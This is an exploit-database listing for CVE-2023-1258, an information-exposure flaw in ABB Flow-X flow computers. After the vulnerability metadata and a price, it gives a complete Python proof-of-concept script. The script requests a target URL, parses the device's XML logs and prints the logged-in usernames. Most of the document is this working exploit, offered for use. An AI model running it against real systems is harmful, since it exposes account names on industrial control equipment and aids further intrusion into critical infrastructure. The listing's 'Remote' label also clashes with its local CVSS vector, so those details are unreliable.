ABB FlowX v4.00 Exposure of Sensitive Information

CVE: CVE-2023-1258
Category: CWE-200
Price: $500
Severity: High
Author: ExploitMaster
Risk: High
Exploitation Type: Remote
Date: 2023-07-21
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070052

Below is a copy:

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
        print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.text)
        sys.exit(1)

    # Parse the XML response and print every "User ... logged in" log entry
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
        test = re.search('User (.*?) logged in', str(log))
        if test:
            print(test.group(0))


def main():
    dump_users()


if __name__ == '__main__':
    main()
